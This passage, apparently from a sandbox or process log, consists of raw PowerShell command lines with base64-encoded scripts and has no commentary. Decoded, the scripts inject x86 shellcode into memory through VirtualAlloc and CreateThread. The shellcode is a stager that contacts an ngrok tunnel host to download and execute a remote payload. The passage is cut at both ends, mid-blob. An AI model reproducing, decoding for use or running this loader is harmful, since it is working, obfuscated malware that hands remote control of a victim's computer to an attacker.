MQAsADAAeABkADMALAAwAHgANgA2ACwAMAB4ADgAYgAsADAAeAAwAGMALAAwAHgANABiACwAMAB4ADgAYgAsADAAeAA1ADgALAAwAHgAMQBjACwAMAB4ADAAMQAsADAAeABkADMALAAwAHgAOABiACwAMAB4ADAANAAsADAAeAA4AGIALAAwAHgAMAAxACwAMAB4AGQAMAAsADAAeAA4ADkALAAwAHgANAA0ACwAMAB4ADIANAAsADAAeAAyADQALAAwAHgANQBiACwAMAB4ADUAYgAsADAAeAA2ADEALAAwAHgANQA5ACwAMAB4ADUAYQAsADAAeAA1ADEALAAwAHgAZgBmACwAMAB4AGUAMAAsADAAeAA1ADgALAAwAHgANQBmACwAMAB4ADUAYQAsADAAeAA4AGIALAAwAHgAMQAyACwAMAB4AGUAOQAsADAAeAA4ADAALAAwAHgAZgBmACwAMAB4AGYAZgAsADAAeABmAGYALAAwAHgANQBkACwAMAB4ADYAOAAsADAAeAA2AGUALAAwAHgANgA1ACwAMAB4ADcANAAsADAAeAAwADAALAAwAHgANgA4ACwAMAB4ADcANwAsADAAeAA2ADkALAAwAHgANgBlACwAMAB4ADYAOQAsADAAeAA1ADQALAAwAHgANgA4ACwAMAB4ADQAYwAsADAAeAA3ADcALAAwAHgAMgA2ACwAMAB4ADAANwAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADMAMQAsADAAeABkAGIALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgAMwBhACwAMAB4ADUANgAsADAAeAA3ADkALAAwAHgAYQA3ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA2AGEALAAwAHgAMAAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANgA4ACwAMAB4ADgAZgAsADAAeAA0ADcALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeABlADgALAAwAHgAYgAwACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADIAZgAsADAAeAA2AGYALAAwAHgANgAzACwAMAB4ADYANAAsADAAeAA0ADMALAAwAHgANAA0ACwAMAB4ADYAOAAsADAAeAA1ADUALAAwAHgANABlACwAMAB4ADcAMgAsADAAeAA2AGYALAAwAHgAMwA4ACwAMAB4ADUAMgAsADAAeAA0ADgALAAwAHgANQAyACwAMAB4ADQAMQAsADAAeAA2ADMALAAwAHgANgA0ACwAMAB4ADMAMgAsADAAeAAzADEALAAwAHgANAA4ACwAMAB4ADMAMgAsADAAeAA0ADEALAAwAHgAMwAzACwAMAB4ADcAMgAsADAAeAA0AGMALAAwAHgANQA1ACwAMAB4ADYANQAsADAAeAA1ADEALAAwAHgANgBkACwAMAB4ADAAMAAsADAAeAA1ADAALAAwAHgANgA4ACwAMAB4ADUANwAsADAAeAA4ADkALAAwAHgAOQBmACwAMAB4AGMANgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgAOQAsADAAeABjADYALAAwAHgANQAzACwAMAB4ADYAOAAsADAAeAAwADAALAAwAHgAMwAyACwAMAB4AGUAOAAsADAAeAA4ADQALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQA3ACwAMAB4ADUAMwAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4AGUAYgAsADAAeAA1ADUALAAwAHgAMgBlACwAMAB4ADMAYgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADkANgAsADAAeAA2AGEALAAwAHgAMABhACwAMAB4ADUAZgAsADAAeAA2ADgALAAwAHgAOAAwACwAMAB4ADMAMwAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADgAOQAsADAAeABlADAALAAwAHgANgBhACwAMAB4ADAANAAsADAAeAA1ADAALAAwAHgANgBhACwAMAB4ADEAZgAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4ADcANQAsADAAeAA0ADYALAAwAHgAOQBlACwAMAB4ADgANgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4ADIAZAAsADAAeAAwADYALAAwAHgAMQA4ACwAMAB4ADcAYgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA1ACwAMAB4ADEANgAsADAAeAA2ADgALAAwAHgAOAA4ACwAMAB4ADEAMwAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAOAAsADAAeAA0ADQALAAwAHgAZgAwACwAMAB4ADMANQAsADAAeABlADAALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA0AGYALAAwAHgANwA1ACwAMAB4AGMAZAAsADAAeAA2ADgALAAwAHgAZgAwACwAMAB4AGIANQAsADAAeABhADIALAAwAHgANQA2ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANgBhACwAMAB4ADQAMAAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADEAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAOAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADQAMAAsADAAeAAwADAALAAwAHgANQAzACwAMAB4ADYAOAAsADAAeAA1ADgALAAwAHgAYQA0ACwAMAB4ADUAMwAsADAAeABlADUALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA5ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA4ADkALAAwAHgAZQA3ACwAMAB4ADUANwAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADIAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADUAMwAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4ADEAMgAsADAAeAA5ADYALAAwAHgAOAA5ACwAMAB4AGUAMgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA0ACwAMAB4AGMAZAAsADAAeAA4AGIALAAwAHgAMAA3ACwAMAB4ADAAMQAsADAAeABjADMALAAwAHgAOAA1ACwAMAB4AGMAMAAsADAAeAA3ADUALAAwAHgAZQA1ACwAMAB4ADUAOAAsADAAeABjADMALAAwAHgANQBmACwAMAB4AGUAOAAsADAAeAA2ADkALAAwAHgAZgBmACwAMAB4AGYAZgAsADAAeABmAGYALAAwAHgAMwAyACwAMAB4ADIAZQAsADAAeAA3ADQALAAwAHgANgAzACwAMAB4ADcAMAAsADAAeAAyAGUALAAwAHgANgA1ACwAMAB4ADcANQAsADAAeAAyAGUALAAwAHgANgBlACwAMAB4ADYANwAsADAAeAA3ADIALAAwAHgANgBmACwAMAB4ADYAYgAsADAAeAAyAGUALAAwAHgANgA5ACwAMAB4ADYAZgAsADAAeAAwADAAOwAkAGUAVwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJABWAFkALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZQBXACAAPQAgACQAVgBZAC4ATABlAG4AZwB0AGgAfQA7ACQAWgBoAD0AJABsAHIAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABlAFcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABsAHIAcAA9ADAAOwAkAGwAcgBwACAALQBsAGUAIAAoACQAVgBZAC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGwAcgBwACsAKwApACAAewAkAGwAcgA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAFoAaAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABsAHIAcAApACwAIAAkAFYAWQBbACQAbAByAHAAXQAsACAAMQApAH0AOwAkAGwAcgA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAWgBoACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwApAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABIAEQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAdQBqACkAKQA7ACQASgBHACAAPQAgACIALQBlAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAFIASgAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABSAEoAIAAkAEoARwAgACQASABEACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAEoARwAgACQASABEACIAOwB9AA=='"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JAB1AGoAIAA9ACAAJwAkAFQATwAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAGwAcgAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAFQATwAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJABWAFkAIAA9ACAAMAB4AGYAYwAsADAAeABlADgALAAwAHgAOABmACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAMAAsADAAeAAzADEALAAwAHgAZAAyACwAMAB4ADgAOQAsADAAeABlADUALAAwAHgANgA0ACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMwAwACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMABjACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMQA0ACwAMAB4ADgAYgAsADAAeAA3ADIALAAwAHgAMgA4ACwAMAB4ADAAZgAsADAAeABiADcALAAwAHgANABhACwAMAB4ADIANgAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4ADMAMQAsADAAeABjADAALAAwAHgAYQBjACwAMAB4ADMAYwAsADAAeAA2ADEALAAwAHgANwBjACwAMAB4ADAAMgAsADAAeAAyAGMALAAwAHgAMgAwACwAMAB4AGMAMQAsADAAeABjAGYALAAwAHgAMABkACwAMAB4ADAAMQAsADAAeABjADcALAAwAHgANAA5ACwAMAB4ADcANQAsADAAeABlAGYALAAwAHgANQAyACwAMAB4ADUANwAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADEAMAAsADAAeAA4AGIALAAwAHgANAAyACwAMAB4ADMAYwAsADAAeAAwADEALAAwAHgAZAAwACwAMAB4ADgAYgAsADAAeAA0ADAALAAwAHgANwA4ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA0ACwAMAB4ADQAYwAsADAAeAAwADEALAAwAHgAZAAwACwAMAB4ADUAMAAsADAAeAA4AGIALAAwAHgANAA4ACwAMAB4ADEAOAAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADIAMAAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADgANQAsADAAeABjADkALAAwAHgANwA0ACwAMAB4ADMAYwAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4ADQAOQAsADAAeAA4AGIALAAwAHgAMwA0ACwAMAB4ADgAYgAsADAAeAAwADEALAAwAHgAZAA2ACwAMAB4ADMAMQAsADAAeABjADAALAAwAHgAYwAxACwAMAB4AGMAZgAsADAAeAAwAGQALAAwAHgAYQBjACwAMAB4ADAAMQAsADAAeABjADcALAAwAHgAMwA4ACwAMAB4AGUAMAAsADAAeAA3ADUALAAwAHgAZgA0ACwAMAB4ADAAMwAsADAAeAA3AGQALAAwAHgAZgA4ACwAMAB4ADMAYgAsADAAeAA3AGQALAAwAHgAMgA0ACwAMAB4ADcANQAsADAAeABlADAALAAwAHgANQA4ACwAMAB4ADgAYgAsADAAeAA1ADgALAAwAHgAMgA0ACwAMAB4ADAAMQAsADAAeABkADMALAAwAHgANgA2ACwAMAB4ADgAYgAsADAAeAAwAGMALAAwAHgANABiACwAMAB4ADgAYgAsADAAeAA1ADgALAAwAHgAMQBjACwAMAB4ADAAMQAsADAAeABkADMALAAwAHgAOABiACwAMAB4ADAANAAsADAAeAA4AGIALAAwAHgAMAAxACwAMAB4AGQAMAAsADAAeAA4ADkALAAwAHgANAA0ACwAMAB4ADIANAAsADAAeAAyADQALAAwAHgANQBiACwAMAB4ADUAYgAsADAAeAA2ADEALAAwAHgANQA5ACwAMAB4ADUAYQAsADAAeAA1ADEALAAwAHgAZgBmACwAMAB4AGUAMAAsADAAeAA1ADgALAAwAHgANQBmACwAMAB4ADUAYQAsADAAeAA4AGIALAAwAHgAMQAyACwAMAB4AGUAOQAsADAAeAA4ADAALAAwAHgAZgBmACwAMAB4AGYAZgAsADAAeABmAGYALAAwAHgANQBkACwAMAB4ADYAOAAsADAAeAA2AGUALAAwAHgANgA1ACwAMAB4ADcANAAsADAAeAAwADAALAAwAHgANgA4ACwAMAB4ADcANwAsADAAeAA2ADkALAAwAHgANgBlACwAMAB4ADYAOQAsADAAeAA1ADQALAAwAHgANgA4ACwAMAB4ADQAYwAsADAAeAA3ADcALAAwAHgAMgA2ACwAMAB4ADAANwAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADMAMQAsADAAeABkAGIALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgAMwBhACwAMAB4ADUANgAsADAAeAA3ADkALAAwAHgAYQA3ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA2AGEALAAwAHgAMAAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANgA4ACwAMAB4ADgAZgAsADAAeAA0ADcALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeABlADgALAAwAHgAYgAwACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADIAZgAsADAAeAA2AGYALAAwAHgANgAzACwAMAB4ADYANAAsADAAeAA0ADMALAAwAHgANAA0ACwAMAB4ADYAOAAsADAAeAA1ADUALAAwAHgANABlACwAMAB4ADcAMgAsADAAeAA2AGYALAAwAHgAMwA4ACwAMAB4ADUAMgAsADAAeAA0ADgALAAwAHgANQAyACwAMAB4ADQAMQAsADAAeAA2ADMALAAwAHgANgA0ACwAMAB4ADMAMgAsADAAeAAzADEALAAwAHgANAA4ACwAMAB4ADMAMgAsADAAeAA0ADEALAAwAHgAMwAzACwAMAB4ADcAMgAsADAAeAA0AGMALAAwAHgANQA1ACwAMAB4ADYANQAsADAAeAA1ADEALAAwAHgANgBkACwAMAB4ADAAMAAsADAAeAA1ADAALAAwAHgANgA4ACwAMAB4ADUANwAsADAAeAA4ADkALAAwAHgAOQBmACwAMAB4AGMANgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgAOQAsADAAeABjADYALAAwAHgANQAzACwAMAB4ADYAOAAsADAAeAAwADAALAAwAHgAMwAyACwAMAB4AGUAOAAsADAAeAA4ADQALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQA3ACwAMAB4ADUAMwAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4AGUAYgAsADAAeAA1ADUALAAwAHgAMgBlACwAMAB4ADMAYgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADkANgAsADAAeAA2AGEALAAwAHgAMABhACwAMAB4ADUAZgAsADAAeAA2ADgALAAwAHgAOAAwACwAMAB4ADMAMwAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADgAOQAsADAAeABlADAALAAwAHgANgBhACwAMAB4ADAANAAsADAAeAA1ADAALAAwAHgANgBhACwAMAB4ADEAZgAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4ADcANQAsADAAeAA0ADYALAAwAHgAOQBlACwAMAB4ADgANgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4ADIAZAAsADAAeAAwADYALAAwAHgAMQA4ACwAMAB4ADcAYgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA1ACwAMAB4ADEANgAsADAAeAA2ADgALAAwAHgAOAA4ACwAMAB4ADEAMwAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAOAAsADAAeAA0ADQALAAwAHgAZgAwACwAMAB4ADMANQAsADAAeABlADAALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA0AGYALAAwAHgANwA1ACwAMAB4AGMAZAAsADAAeAA2ADgALAAwAHgAZgAwACwAMAB4AGIANQAsADAAeABhADIALAAwAHgANQA2ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANgBhACwAMAB4ADQAMAAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADEAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAOAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADQAMAAsADAAeAAwADAALAAwAHgANQAzACwAMAB4ADYAOAAsADAAeAA1ADgALAAwAHgAYQA0ACwAMAB4ADUAMwAsADAAeABlADUALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA5ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA4ADkALAAwAHgAZQA3ACwAMAB4ADUANwAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADIAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADUAMwAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4ADEAMgAsADAAeAA5ADYALAAwAHgAOAA5ACwAMAB4AGUAMgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA0ACwAMAB4AGMAZAAsADAAeAA4AGIALAAwAHgAMAA3ACwAMAB4ADAAMQAsADAAeABjADMALAAwAHgAOAA1ACwAMAB4AGMAMAAsADAAeAA3ADUALAAwAHgAZQA1ACwAMAB4ADUAOAAsADAAeABjADMALAAwAHgANQBmACwAMAB4AGUAOAAsADAAeAA2ADkALAAwAHgAZgBmACwAMAB4AGYAZgAsADAAeABmAGYALAAwAHgAMwAyACwAMAB4ADIAZQAsADAAeAA3ADQALAAwAHgANgAzACwAMAB4ADcAMAAsADAAeAAyAGUALAAwAHgANgA1ACwAMAB4ADcANQAsADAAeAAyAGUALAAwAHgANgBlACwAMAB4ADYANwAsADAAeAA3ADIALAAwAHgANgBmACwAMAB4ADYAYgAsADAAeAAyAGUALAAwAHgANgA5ACwAMAB4ADYAZgAsADAAeAAwADAAOwAkAGUAVwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJABWAFkALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZQBXACAAPQAgACQAVgBZAC4ATABlAG4AZwB0AGgAfQA7ACQAWgBoAD0AJABsAHIAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABlAFcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABsAHIAcAA9ADAAOwAkAGwAcgBwACAALQBsAGUAIAAoACQAVgBZAC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGwAcgBwACsAKwApACAAewAkAGwAcgA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAFoAaAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABsAHIAcAApACwAIAAkAFYAWQBbACQAbAByAHAAXQAsACAAMQApAH0AOwAkAGwAcgA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAWgBoACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwApAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABIAEQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAdQBqACkAKQA7ACQASgBHACAAPQAgACIALQBlAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAFIASgAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABSAEoAIAAkAEoARwAgACQASABEACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAEoARwAgACQASABEACIAOwB9AA==

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -ec JABUAE8AIAA9ACAAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAOwAkAGwAcgAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAFQATwAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJABWAFkAIAA9ACAAMAB4AGYAYwAsADAAeABlADgALAAwAHgAOABmACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAMAAsADAAeAAzADEALAAwAHgAZAAyACwAMAB4ADgAOQAsADAAeABlADUALAAwAHgANgA0ACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMwAwACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMABjACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMQA0ACwAMAB4ADgAYgAsADAAeAA3ADIALAAwAHgAMgA4ACwAMAB4ADAAZgAsADAAeABiADcALAAwAHgANABhACwAMAB4ADIANgAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4ADMAMQAsADAAeABjADAALAAwAHgAYQBjACwAMAB4ADMAYwAsADAAeAA2ADEALAAwAHgANwBjACwAMAB4ADAAMgAsADAAeAAyAGMALAAwAHgAMgAwACwAMAB4AGMAMQAsADAAeABjAGYALAAwAHgAMABkACwAMAB4ADAAMQAsADAAeABjADcALAAwAHgANAA5ACwAMAB4ADcANQAsADAAeABlAGYALAAwAHgANQAyACwAMAB4ADUANwAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADEAMAAsADAAeAA4AGIALAAwAHgANAAyACwAMAB4ADMAYwAsADAAeAAwADEALAAwAHgAZAAwACwAMAB4ADgAYgAsADAAeAA0ADAALAAwAHgANwA4ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA0ACwAMAB4ADQAYwAsADAAeAAwADEALAAwAHgAZAAwACwAMAB4ADUAMAAsADAAeAA4AGIALAAwAHgANAA4ACwAMAB4ADEAOAAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADIAMAAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADgANQAsADAAeABjADkALAAwAHgANwA0ACwAMAB4ADMAYwAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4ADQAOQAsADAAeAA4AGIALAAwAHgAMwA0ACwAMAB4ADgAYgAsADAAeAAwADEALAAwAHgAZAA2ACwAMAB4ADMAMQAsADAAeABjADAALAAwAHgAYwAxACwAMAB4AGMAZgAsADAAeAAwAGQALAAwAHgAYQBjACwAMAB4ADAAMQAsADAAeABjADcALAAwAHgAMwA4ACwAMAB4AGUAMAAsADAAeAA3ADUALAAwAHgAZgA0ACwAMAB4ADAAMwAsADAAeAA3AGQALAAwAHgAZgA4ACwAMAB4ADMAYgAsADAAeAA3AGQALAAwAHgAMgA0ACwAMAB4ADcANQAsADAAeABlADAALAAwAHgANQA4ACwAMAB4ADgAYgAsADAAeAA1ADgALAAw